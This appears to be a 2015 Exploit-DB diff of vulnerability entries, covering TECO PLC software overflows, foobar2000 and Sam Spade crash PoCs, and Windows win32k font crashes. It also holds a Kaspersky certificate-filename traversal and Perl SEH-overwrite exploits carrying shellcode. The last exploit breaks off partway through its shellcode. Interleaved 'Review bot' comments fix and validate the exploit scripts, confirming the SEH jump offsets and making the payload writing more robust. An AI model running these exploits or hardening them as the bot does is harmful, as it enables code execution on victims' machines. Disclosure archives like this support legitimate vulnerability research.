# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5276
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5276.php
#
#
# 09.10.2015
#
PoC:
- http://zeroscience.mk/codes/sg2fbd-5276.zip
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38701.zip

48
platforms/windows/dos/38702.txt Executable file

@ -0,0 +1,48 @@
# TECO TP3-PCLINK 2.1 TPC File Handling Buffer Overflow Vulnerability
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Affected version: 2.1
#
# Summary: TP3-PCLINK Software is the supportive software for TP03, providing
# three edit modes as LADDER, IL ,FBDand SFC, by which programs can be input
# rapidly and correctly.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a project file, which can be exploited to cause a buffer overflow when a
# user opens e.g. a specially crafted .TPC file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# (794.193c): C++ EH exception - code e06d7363 (first chance)
# Critical error detected c0000374
# (794.193c): Break instruction exception - code 80000003 (first chance)
# eax=00000000 ebx=00000000 ecx=778f0b42 edx=0018db71 esi=02730000 edi=41414141
# eip=7794e725 esp=0018ddc4 ebp=0018de3c iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
# ntdll!RtlpNtEnumerateSubKey+0x1af8:
# 7794e725 cc int 3
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5277
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5277.php
#
#
# 09.10.2015
#
PoC:
- http://zeroscience.mk/codes/tp3tpc-5277.zip
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38702.zip

48
platforms/windows/dos/38703.txt Executable file

@ -0,0 +1,48 @@
# TECO AP-PCLINK 1.094 TPC File Handling Buffer Overflow Vulnerability
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 1.094
#
# Summary: AP-PCLINK is the supportive software for TP03 or AP series, providing
# three edit modes as LADDER, IL, FBDand SFC, by which programs can be input rapidly
# and correctly. Every form written into the TP03 or AP series and AP-PCLINK can
# be monitored in the form of the data.
#
# Desc: The vulnerability is caused due to a boundary error in the processing
# of a project file, which can be exploited to cause a buffer overflow when a
# user opens e.g. a specially crafted .TPC file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# Critical error detected c0000374
# (1950.ff0): Break instruction exception - code 80000003 (first chance)
# eax=00000000 ebx=00000000 ecx=76f70b42 edx=0018d98d esi=00360000 edi=41414141
# eip=76fce725 esp=0018dbe0 ebp=0018dc58 iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
# ntdll!RtlpNtEnumerateSubKey+0x1af8:
# 76fce725 cc int 3
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5278
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5278.php
#
#
# 09.10.2015
#
PoC:
- http://zeroscience.mk/codes/aptpc-5278.zip
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38703.zip

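--- a/platforms/windows/dos/38705.py
+++ b/platforms/windows/dos/38705.py
@@ -0,0 +1,35 @@
+#!/usr/bin/env python
+# Exploit Title : Sam Spade 1.14 Browse URL Buffer Overflow PoC
+# Discovery by : Nipun Jaswal
+# Email : mail@nipunjaswal.info
+# Discovery Date : 14/11/2015
+# Vendor Homepage : http://samspade.org
+# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
+# Tested Version : 1.14
+# Vulnerability Type: Denial of Service / Proof Of Concept/ Eip Overwrite
+# Tested on OS : Windows 7 Home Basic
+# Crash Point : Go to Tools > Browse Web> Enter the contents of 'sam_spade_browse_url.txt' > OK , Note: Do #Not Remove the http://
+##########################################################################################
+# -----------------------------------NOTES----------------------------------------------#
+##########################################################################################
+# And the Stack
+#0012F73C 41414141 AAAA
+#0012F740 41414141 AAAA
+#0012F744 DEADBEAF ¯¾­Þ
+# Registers
+#EAX 00000001
+#ECX 00000001
+#EDX 00000030
+#EBX 00000000
+#ESP 0012F74C
+#EBP 41414141
+#ESI 008DA260
+#EDI 0176F4E0
+#EIP DEADBEAF
+f = open("sam_spade_browse_url.txt", "w")
+Junk = "A"* 496
+eip_overwrite = "\xaf\xbe\xad\xde"
+f.write(Junk+eip_overwrite)
+f.close()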
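Review bot: The output file is opened in text mode (`"w"`) while the last four bytes are written as a non-ASCII string literal; under Python 3, which the unversioned `#!/usr/bin/env python` shebang may resolve to, that literal is encoded with the locale codec and the bytes on disk no longer match the `DEADBEAF` value the register dump shows. Opening in binary mode with a bytes payload behaves the same on both interpreters, and a `with` block closes the handle on error: `with open("sam_spade_browse_url.txt", "wb") as f:` / `    f.write(b"A" * 496 + b"\xaf\xbe\xad\xde")`. The crash-point comment also has a stray `#` mid-sentence (`Do #Not Remove`), which reads as an accident of line wrapping.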

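--- a/platforms/windows/dos/38710.py
+++ b/platforms/windows/dos/38710.py
@@ -0,0 +1,27 @@
+# Exploit Title: foobar2000 1.3.9 (.pls; .m3u; .m3u8) Local Crash PoC
+# Date: 11-15-2015
+# Exploit Author: Antonio Z.
+# Vendor Homepage: http://www.foobar2000.org/
+# Software Link: http://www.foobar2000.org/getfile/036be51abc909653ad44d664f0ce3668/foobar2000_v1.3.9.exe
+# Version: 1.3.9
+# Tested on: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64
+import os
+evil = '\x41' * 256
+pls = '[playlist]\n' + 'NumberOfEntries=1\n' +'File1=http://' + evil + '\n' + 'Title1=\n' + 'Length1=-1\n'
+m3u = 'http://' + evil
+m3u8 = 'http://' + evil
+file = open('Local_Crash_PoC.pls', 'wb')
+file.write(pls)
+file.close()
+file = open('Local_Crash_PoC.m3u', 'wb')
+file.write(m3u)
+file.close()
+file = open('Local_Crash_PoC.m3u8', 'wb')
+file.write(m3u8)
+file.close()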
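Review bot: The three open/write/close sequences are the same code repeated with different file names, the handle is bound to `file`, which shadows the builtin, and `import os` is unused. The files are opened with `'wb'` but written `str` data, which works on Python 2 and raises TypeError on Python 3; since no interpreter version is stated, encoding the payload explicitly makes the script run on both. A single loop with `with` covers all three playlists and closes each handle even if a write fails:
```python
# … unchanged: evil / pls / m3u / m3u8 definitions …
for name, data in (('Local_Crash_PoC.pls', pls),
                   ('Local_Crash_PoC.m3u', m3u),
                   ('Local_Crash_PoC.m3u8', m3u8)):
    with open(name, 'wb') as out:
        out.write(data.encode('ascii'))
```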

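--- a/platforms/windows/dos/38711.py
+++ b/platforms/windows/dos/38711.py
@@ -0,0 +1,40 @@
+# Exploit Title: foobar2000 1.3.9 (.asx) Local Crash PoC
+# Date: 11-15-2015
+# Exploit Author: Antonio Z.
+# Vendor Homepage: http://www.foobar2000.org/
+# Software Link: http://www.foobar2000.org/getfile/036be51abc909653ad44d664f0ce3668/foobar2000_v1.3.9.exe
+# Version: 1.3.9
+# Tested on: Windows XP SP3, Windows 7 SP1 x86, Windows 7 SP1 x64, Windows 8.1 x64, Windows 10 x64
+# Instructions: Create playlist.asx:
+# <asx version="3.0">
+# <title>Example.com Live Stream</title>
+#
+# <entry>
+# <title>Short Announcement to Play Before Main Stream</title>
+# <ref href="http://example.com/announcement.wma" />
+# <param name="aParameterName" value="aParameterValue" />
+# </entry>
+#
+# <entry>
+# <title>Example radio</title>
+# <ref href="http://example.com" />
+# <author>Example.com</author>
+# <copyright>example.com</copyright>
+# </entry>
+# </asx>
+import os
+import shutil
+evil = 'A' * 256
+shutil.copy ('playlist.asx', 'Local_Crash_PoC.asx')
+file = open('Local_Crash_PoC.asx','r')
+file_data = file.read()
+file.close()
+file_new_data = file_data.replace('<ref href="http://example.com" />','<ref href="http://' + evil + '" />')
+file = open('Local_Crash_PoC.asx','w')
+file.write(file_new_data)
+file.close()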
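Review bot: The script copies `playlist.asx` to the output path with shutil and then reads, modifies and rewrites that copy, when reading the template and writing the result directly would do; `import os` is unused and `file` shadows the builtin. The replacement targets the exact string `<ref href="http://example.com" />`, so any whitespace difference in the hand-written playlist from the Instructions comment silently yields an unmodified copy with nothing telling the user the PoC was not built; checking that the marker is present before writing avoids that. Suggested rewrite of the I/O part:
```python
# … unchanged: header comments and evil …
target = '<ref href="http://example.com" />'
with open('playlist.asx', 'r') as src:
    file_data = src.read()
if target not in file_data:
    raise SystemExit('playlist.asx does not contain the expected <ref> entry')
with open('Local_Crash_PoC.asx', 'w') as dst:
    dst.write(file_data.replace(target, '<ref href="http://' + evil + '" />'))
```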

87
platforms/windows/dos/38713.txt Executable file

@ -0,0 +1,87 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=507
We have observed a number of Windows kernel crashes in the win32k.sys driver while processing corrupted TTF font files. An example of a crash log excerpt generated after triggering the bug is shown below:
---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: fffff900c49ab000, memory referenced
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation
Arg3: fffff96000324c14, if non-zero, the address which referenced memory.
Arg4: 0000000000000000, (reserved)
[...]
FAULTING_IP:
win32k!or_all_N_wide_rotated_need_last+70
fffff960`00324c14 410802 or byte ptr [r10],al
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0xD6
CURRENT_IRQL: 0
TRAP_FRAME: fffff88007531690 -- (.trap 0xfffff88007531690)
.trap 0xfffff88007531690
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=fffff880075318ff rbx=0000000000000000 rcx=0000000000000007
rdx=00000000000000ff rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000324c14 rsp=fffff88007531820 rbp=fffffffffffffff5
r8=00000000ffffffff r9=fffff900c1b48995 r10=fffff900c49ab000
r11=0000000000000007 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
win32k!or_all_N_wide_rotated_need_last+0x70:
fffff960`00324c14 410802 or byte ptr [r10],al ds:0b08:fffff900`c49ab000=??
.trap
Resetting default scope
LAST_CONTROL_TRANSFER: from fffff8000294a017 to fffff800028cd5c0
STACK_TEXT:
fffff880`07531528 fffff800`0294a017 : 00000000`00000050 fffff900`c49ab000 00000000`00000001 fffff880`07531690 : nt!KeBugCheckEx
fffff880`07531530 fffff800`028cb6ee : 00000000`00000001 fffff900`c49ab000 fffff900`c4211000 fffff900`c49ab002 : nt! ?? ::FNODOBFM::`string'+0x4174f
fffff880`07531690 fffff960`00324c14 : 00000000`0000001f fffff960`000b8f1f fffff900`c4ed2f08 00000000`0000001f : nt!KiPageFault+0x16e
fffff880`07531820 fffff960`000b8f1f : fffff900`c4ed2f08 00000000`0000001f 00000000`00000002 00000000`00000007 : win32k!or_all_N_wide_rotated_need_last+0x70
fffff880`07531830 fffff960`000eba0d : 00000000`00000000 fffff880`07532780 00000000`00000000 00000000`0000000a : win32k!draw_nf_ntb_o_to_temp_start+0x10f
fffff880`07531890 fffff960`000c5ab8 : 00000000`00000000 fffff900`c49aad60 fffff900`c4ed2ed0 00000000`00ffffff : win32k!vExpandAndCopyText+0x1c5
fffff880`07531c30 fffff960`00874b4b : fffff900`0000000a fffff880`00000002 fffff900`c4484ca0 fffff880`07532368 : win32k!EngTextOut+0xe54
fffff880`07531fc0 fffff900`0000000a : fffff880`00000002 fffff900`c4484ca0 fffff880`07532368 00000000`00000000 : VBoxDisp+0x4b4b
fffff880`07531fc8 fffff880`00000002 : fffff900`c4484ca0 fffff880`07532368 00000000`00000000 fffff880`07532110 : 0xfffff900`0000000a
fffff880`07531fd0 fffff900`c4484ca0 : fffff880`07532368 00000000`00000000 fffff880`07532110 fffff900`c49b6d58 : 0xfffff880`00000002
fffff880`07531fd8 fffff880`07532368 : 00000000`00000000 fffff880`07532110 fffff900`c49b6d58 fffff900`c49b6de8 : 0xfffff900`c4484ca0
fffff880`07531fe0 00000000`00000000 : fffff880`07532110 fffff900`c49b6d58 fffff900`c49b6de8 fffff900`c49b6c30 : 0xfffff880`07532368
---
While the above is only one example, we have seen the issue manifest itself in a variety of ways: either by crashing while trying to write beyond a pool allocation in the win32k!or_all_4_wide_rotated_need_last, win32k!or_all_N_wide_rotated_need_last, win32k!or_all_N_wide_rotated_no_last or win32k!or_all_N_wide_unrotated functions, or in other locations in the kernel due to system instability caused by pool corruption. In all cases, the crash occurs somewhere below a win32k!EngTextOut function call, i.e. it is triggered while trying to display the glyphs of a malformed TTF on the screen, rather than while loading the font in the system.
We believe the condition to be a pool-based buffer overflow triggered by one of the above win32k.sys functions, with a binary -or- operation being performed on bytes outside a pool allocation. This is also confirmed by the fact that various system bugchecks we have observed are a consequence of the kernel trying to dereference addresses with too many bits set, e.g.:
---
rax=fffff91fc29b4c60 rbx=0000000000000000 rcx=fffff900c4ede320
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000271f6a rsp=fffff880035b8bd0 rbp=fffff880035b9780
r8=000000000000021d r9=fffff900c4edf000 r10=fffff880056253f4
r11=fffff900c4902eb0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
win32k!PopThreadGuardedObject+0x16:
fffff960`00271f6a 4c8918 mov qword ptr [rax],r11 ds:0030:fffff91f`c29b4c60=????????????????
---
While we have not determined the specific root cause of the vulnerability, the proof-of-concept TTF files triggering the bug were created by taking legitimate fonts and replacing the glyph TrueType programs with ones generated by a dedicated generator. Therefore, the problem is almost certainly caused by some part of the arbitrary TrueType programs.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (typically leading to an immediate crash in one of the aforementioned functions when the overflow takes place), but it is also possible to observe a system crash on a default Windows installation as a consequence of pool corruption and resulting system instability. In order to reproduce the problem with the provided samples, it is necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with several proof-of-concept TTF files, together with corresponding kernel crash logs from Windows 7 64-bit.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38713.zip

84
platforms/windows/dos/38714.txt Executable file

@ -0,0 +1,84 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=506
We have encountered a number of Windows kernel crashes in the win32k.sys driver while processing a specific corrupted TTF font file. The cleanest stack trace we have acquired, which might also indicate where the pool corruption takes place and/or the root cause of the vulnerability, is shown below:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fffff900c4c31000, memory referenced.
Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.
Arg3: fffff96000156a34, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 0000000000000000, (reserved)
[...]
FAULTING_IP:
win32k!memmove+64
fffff960`00156a34 488901 mov qword ptr [rcx],rax
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
CURRENT_IRQL: 0
TRAP_FRAME: fffff880074a0210 -- (.trap 0xfffff880074a0210)
.trap 0xfffff880074a0210
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=fffff47cffffe440 rbx=0000000000000000 rcx=fffff900c4c31000
rdx=000000000141f518 rsi=0000000000000000 rdi=0000000000000000
rip=fffff96000156a34 rsp=fffff880074a03a8 rbp=0000000000000010
r8=0000000000000018 r9=0000000000000001 r10=fffff900c4c211a8
r11=fffff900c4c30ff0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
win32k!memmove+0x64:
fffff960`00156a34 488901 mov qword ptr [rcx],rax ds:a020:fffff900`c4c31000=????????????????
.trap
Resetting default scope
LAST_CONTROL_TRANSFER: from fffff800028fa017 to fffff8000287d5c0
STACK_TEXT:
fffff880`074a00a8 fffff800`028fa017 : 00000000`00000050 fffff900`c4c31000 00000000`00000001 fffff880`074a0210 : nt!KeBugCheckEx
fffff880`074a00b0 fffff800`0287b6ee : 00000000`00000001 fffff900`c4c31000 fffff880`074a0400 fffff900`c4c30fd8 : nt! ?? ::FNODOBFM::`string'+0x4174f
fffff880`074a0210 fffff960`00156a34 : fffff960`00252e40 fffff900`c4c30f98 00000000`00000003 fffff900`c48f2eb0 : nt!KiPageFault+0x16e
fffff880`074a03a8 fffff960`00252e40 : fffff900`c4c30f98 00000000`00000003 fffff900`c48f2eb0 fffff960`002525dc : win32k!memmove+0x64
fffff880`074a03b0 fffff960`0031d38e : 00000000`000028a6 fffff900`c4c30fd8 00000000`00000000 fffff900`c4c21008 : win32k!EPATHOBJ::bClone+0x138
fffff880`074a0400 fffff960`000f07bb : fffff880`00002640 fffff900`c576aca0 00000000`00002640 fffff880`00000641 : win32k!RFONTOBJ::bInsertMetricsPlusPath+0x17e
fffff880`074a0540 fffff960`000eccf7 : fffff880`074a2640 fffff880`074a0a68 fffff880`074a0b40 fffff800`00000641 : win32k!xInsertMetricsPlusRFONTOBJ+0xe3
fffff880`074a0610 fffff960`000ec998 : fffff880`074a0b40 fffff880`074a0a68 fffff900`c0480014 00000000`00000179 : win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x1f7
fffff880`074a0690 fffff960`000ec390 : fffff980`00000000 fffff880`074a0830 fffff900`c04a8000 fffff800`00000008 : win32k!ESTROBJ::vCharPos_H3+0x168
fffff880`074a0710 fffff960`000ed841 : 00000000`41800000 00000000`00000000 00000000`0000000a fffff880`074a0830 : win32k!ESTROBJ::vInit+0x350
fffff880`074a07a0 fffff960`000ed4ef : fffff880`074a0ca0 fffff900`c576aca0 ffffd08c`00000020 ffffffff`ffffffff : win32k!GreGetTextExtentExW+0x275
fffff880`074a0a60 fffff800`0287c853 : 00000000`00000000 fffff880`074a0ca0 00000000`00000001 fffff880`00000000 : win32k!NtGdiGetTextExtentExW+0x237
fffff880`074a0bb0 00000000`750a213a : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13
00000000`0025e1c8 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x750a213a
---
We have also observed a number of other system bugchecks caused by the particular TTF file with various stack traces indicating a pool corruption condition. For example, on Windows 7 32-bit a crash occurs only while deleting the font, under the following call stack:
---
9823bc7c 90d8dec1 fb634cf0 fb60ecf0 00000001 win32k!RFONTOBJ::vDeleteCache+0x56
9823bca8 90d14209 00000000 00000000 00000001 win32k!RFONTOBJ::vDeleteRFONT+0x190
9823bcd0 90d15e00 9823bcf4 fb62ccf0 00000000 win32k!PUBLIC_PFTOBJ::bLoadFonts+0x6fb
9823bd00 90ddf48e 00000008 fbc16ff8 912f8fc8 win32k!PFTOBJ::bUnloadWorkhorse+0x114
9823bd28 8267ea06 13000117 0040fa24 775e71b4 win32k!GreRemoveFontMemResourceEx+0x60
9823bd28 775e71b4 13000117 0040fa24 775e71b4 nt!KiSystemServicePostCall
---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "OS/2" table.
The issue reproduces on Windows 7 (32 and 64-bit). It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it it also possible to observe a system crash on a default Windows installation as a consequence of pool corruption and resulting system instability. In order to reproduce the problem with the provided sample, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with the proof-of-concept mutated TTF file, together with the original font used to generate it and a corresponding kernel crash log from Windows 7 64-bit.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38714.zip

37
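--- /dev/null
+++ b/platforms/windows/dos/38734.txt
@@ -0,0 +1,37 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=539
+When Kaspersky https inspection is enabled, temporary certificates are created in %PROGRAMDATA% for validation. I observed that the naming pattern is {CN}.cer.
+I created a certificate with CN="../../../../Users/All Users/Start Menu/Startup/foo.bat\x00", browsed to an SSL server presenting that certificate and Kaspersky created that certificate name. Jumping from this to code execution seems quite straightforward. I didn't try it, but it seems quite easy to make some ASN.1/X.509 that is also a valid batch file or some other relaxed-parsing format.
+Here is how to generate a certificate to reproduce:
+$ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 360
+Generating a 2048 bit RSA private key
+......................................................................+++
+...............+++
+writing new private key to 'key.pem'
+Enter PEM pass phrase:
+Verifying - Enter PEM pass phrase:
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [AU]:
+State or Province Name (full name) [Some-State]:
+Locality Name (eg, city) []:
+Organization Name (eg, company) [Internet Widgits Pty Ltd]:
+Organizational Unit Name (eg, section) []:
+Common Name (e.g. server FQDN or YOUR name) []:../../../../../Users/All Users/Desktop/hello
+Email Address []:
+Then test start a server like this:
+$ openssl s_server -key key.pem -cert cert.pem -accept 8080
+And then navigate to https://host:8080 from the Windows host, and observe a certificate called hello.cer on the desktop. I attached a screenshot to demonstrate. I can't believe this actually worked, note that it's not necessary to click or interact with anything to produce the file.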
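Review bot: The reproduction steps only demonstrate the Desktop/hello variant, which ends up as `hello.cer` because the `{CN}.cer` naming appends the extension, while the second paragraph claims a `Start Menu/Startup/foo.bat\x00` name; whether the embedded NUL actually truncates the suffix is asserted but never shown, and the traversal depth also differs between the two examples (four versus five `../`). A reader should be told what was verified, e.g. add after the last sentence: `Note: only the Desktop/hello.cer write was confirmed; the NUL-truncated Startup/foo.bat name and the Startup-folder drop were not tested.` Since the written bytes are the server's own certificate, turning the arbitrary-filename write into code execution still needs a cert that also parses as a batch file, which the text already says was not attempted; stating the base directory under %PROGRAMDATA% that the `../` sequences are relative to would make the depth reproducible.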


@ -0,0 +1,78 @@
#!/usr/bin/perl
#
#
# TECO SG2 LAD Client 3.51 SEH Overwrite Buffer Overflow Exploit
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 3.51 and 3.40
#
# Summary: SG2 Client is a program that enables to create and edit applications.
# The program is providing two edit modes, LADDER and FBD to rapidly and directly
# input the required app. The Simulation Mode allows users to virtually run and test
# the program before it is loaded to the controller.
#
# Desc: The vulnerability is caused due to a boundary error in the processing of a
# Genie LAD file, which can be exploited to cause a buffer overflow when a user opens
# e.g. a specially crafted .GEN file. Successful exploitation could allow execution
# of arbitrary code on the affected machine.
#
# ---------------------------------------------------------------------------------
# (10bc.1358): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=43434343 edx=7794b4ad esi=00000000 edi=00000000
# eip=43434343 esp=0018dc24 ebp=0018dc44 iopl=0 nv up ei pl zr na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
# 43434343 ?? ???
# 0:000> !exchain
# 0018dc38: ntdll!LdrRemoveLoadAsDataTable+d64 (7794b4ad)
# 0018e1d4: ntdll!LdrRemoveLoadAsDataTable+d64 (7794b4ad)
# 0018e800: MFC42!Ordinal1580+373 (708df2fc)
# 0018f098: 43434343
# Invalid exception stack at 42424242
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5275
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5275.php
#
#
# 09.10.2015]
#
# 113 bytes MessageBox shellcode
my $sc = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x65\x64".
"\x21\x01\x68\x20\x50\x77\x6e\x68\x20\x5a\x53\x4c\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
# Address = 0041D659
# Message = 0x0041d659 : pop edi # pop esi # ret 0x04
# startnull {PAGE_EXECUTE_READ} [LAD.exe]
# ASLR: False;
# Rebase: False;
# SafeSEH: False;
# OS: False;
# v0.2.9.0 (C:\Program Files (x86)\TECO\SG2 Client\LAD.exe)
my $file = "lad.gen";
my $junk = "\x41" x 21750 . "\xEB\x08\x90\x90" . "\x59\xd6\x41\x00" . "\x90" x 28 . $sc . "\x90" x 20;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "Malicious GEN file created successfully!\n";
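Review bot: The file write at `open($FILE,">$file");` is a two-argument open on a bareword handle with no error check and no `binmode`, and the script runs without `use strict; use warnings;`, so a failed open still prints "created successfully" and a text-mode handle on a Windows Perl would CRLF-translate any 0x0A byte in the payload. This particular payload contains no 0x0A byte, so the offsets survive today, but swapping in other shellcode would silently break the 21750-byte SEH offset. Suggested replacement for the three I/O lines: `open(my $fh, '>', $file) or die "open $file: $!"; binmode($fh);`, `print {$fh} $junk;`, `close($fh) or die "close $file: $!";`. The handler `\x59\xd6\x41\x00` is well annotated as `pop edi # pop esi # ret 0x04` in LAD.exe without SafeSEH/ASLR; `\xEB\x08` skips the two NOPs and the four handler bytes plus two more, landing inside the 28-byte NOP sled, which is consistent.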


@ -0,0 +1,77 @@
#!/usr/bin/perl
#
#
# TECO JN5 L510-DriveLink 1.482 SEH Overwrite Buffer Overflow Exploit
#
#
# Vendor: TECO Electric and Machinery Co., Ltd.
# Product web page: http://www.teco-group.eu
# Download: http://globalsa.teco.com.tw/support_download.aspx?KindID=9
# Affected version: 1.482 and 1.462
#
# Summary: JN5 DriveLink is a free program that enables you to
# configure the AC Motor Drive, 510 Series PC-Link. It provides
# support for sleep and fire modes favourable for pumps, fans,
# compressors, and HVAC and communication network protocol of
# Modbus/ BACnet/ Metasys N2.
#
# Desc: The vulnerability is caused due to a boundary error in the
# processing of a project file, which can be exploited to cause a
# buffer overflow when a user opens e.g. a specially crafted .LF5 file.
# Successful exploitation could allow execution of arbitrary code on
# the affected machine.
#
# ---------------------------------------------------------------------------------
# (14c0.12ec): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\MFC42.DLL -
# *** WARNING: Unable to verify checksum for C:\Program Files (x86)\TECO\JN5 DriveLink\L510-DriveLink\L510-DriveLink.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\TECO\JN5 DriveLink\L510-DriveLink\L510-DriveLink.exe
# eax=000026a0 ebx=0018f430 ecx=41414141 edx=00000001 esi=0018f408 edi=ffffd961
# eip=70735d7e esp=0018f350 ebp=0018f364 iopl=0 nv up ei ng nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210282
# MFC42!Ordinal2740+0xaa:
# 70735d7e 8b01 mov eax,dword ptr [ecx] ds:002b:41414141=????????
# 0:000> !exchain
# 0018f3e4: 41414141
# Invalid exception stack at 41414141
# ---------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit
# Microsoft Windows 7 Ultimate SP1 (EN) 64bit
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2015-5279
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5279.php
#
#
# 09.10.2015]
#
my $header = "\x04\x00\x00\x00\x0A\x00\x00\x00\x4C\x35\x31\x30\x2D\x31".
"\x50\x32\x2D\x48\x0E\x00\x00\x00\x14\x00\x00\x00\x01\x00";
# 113 bytes MessageBox shellcode
my $sc = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
